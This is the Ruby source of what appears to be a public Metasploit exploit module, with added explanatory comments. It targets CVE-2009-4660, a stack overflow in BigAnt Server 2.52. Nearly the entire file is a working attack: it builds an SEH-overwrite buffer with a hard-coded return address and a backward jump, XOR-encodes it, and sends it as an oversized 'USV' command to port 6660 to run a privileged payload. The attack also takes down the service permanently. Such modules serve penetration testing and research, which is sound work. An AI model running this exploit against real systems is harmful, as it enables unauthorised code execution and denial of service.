GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/misc/bigant_server_usv.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  # Tcp supplies connect/sock/disconnect; Seh supplies generate_seh_record.
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Declares the module metadata for CVE-2009-4660 (BigAnt Server 2.52,
  # AntServer "USV" command stack overflow): references, the single
  # universal target, payload constraints and the default port 6660/tcp.
  #
  # @param info [Hash] metadata merged into the defaults by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'BigAnt Server 2.52 USV Buffer Overflow',
        'Description' => %q{
This exploits a stack buffer overflow in the BigAnt Messaging Service,
part of the BigAnt Server product suite. This module was tested
successfully against version 2.52.

NOTE: The AntServer service does not restart, you only get one shot.
        },
        'Author' => [
          'Lincoln',
          'DouBle_Zer0',
          'jduck'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2009-4660' ],
          [ 'OSVDB', '61386' ],
          [ 'EDB', '10765' ],
          [ 'EDB', '10973' ]
        ],
        # The service runs with elevated rights, so the payload does too.
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'seh',
        },
        'Payload' => {
          # NOTE(review): the three summands presumably correspond to
          # regions of the overflowed buffer -- confirm against the PoC.
          'Space' => (218 + 709 + 35),
          # Listed as the bytes look AFTER the 0x2a XOR that #exploit
          # applies to the whole buffer; the commented line below is the
          # same set as the service sees them before the XOR.
          'BadChars' => "\x2a\x20\x27\x0a\x0f",
          # pre-xor with 0x2a:
          # 'BadChars' => "\x00\x0a\x0d\x20\x25",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'BigAnt 2.52 Universal', { 'Ret' => 0x1b019fd6 } ], # Tested OK (jduck) p/p/r msjet40.dll xpsp3
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2009-12-29',
        # Reliability/stability are not characterised; per the description
        # the service does not restart after a crash, so a failed attempt
        # leaves it down (a loud, easily noticed side effect).
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(6660)])
  end

  # Builds the overflow buffer, XOR-encodes it as the service expects and
  # sends it as a single oversized "USV" command, then hands off to the
  # payload handler.
  #
  # @return [void]
  def exploit
    # TCP connection to RHOST:RPORT from the Tcp mixin.
    connect

    sploit = ""
    sploit << payload.encoded
    sploit << generate_seh_record(target.ret)
    # Short backward jump over the payload space, assembled with Metasm.
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + payload_space.to_s).encode_string
    sploit << rand_text_alphanumeric(3)
    # Three little-endian 32-bit filler words.
    sploit << [0xdeadbeef].pack('V') * 3

    # the buffer gets xor'd with 0x2a !
    # Applied to every byte so the service's own XOR restores the intended
    # bytes; this is why 'BadChars' above is expressed post-XOR.
    sploit = sploit.unpack("C*").map { |c| c ^ 0x2a }.pack("C*")

    print_status("Trying target #{target.name}...")
    # On the wire: "USV " + XOR-encoded buffer + "\r\n\r\n". The abnormal
    # length of a USV command is the observable a network signature keys on.
    sock.put("USV " + sploit + "\r\n\r\n")

    handler
    disconnect
  end
end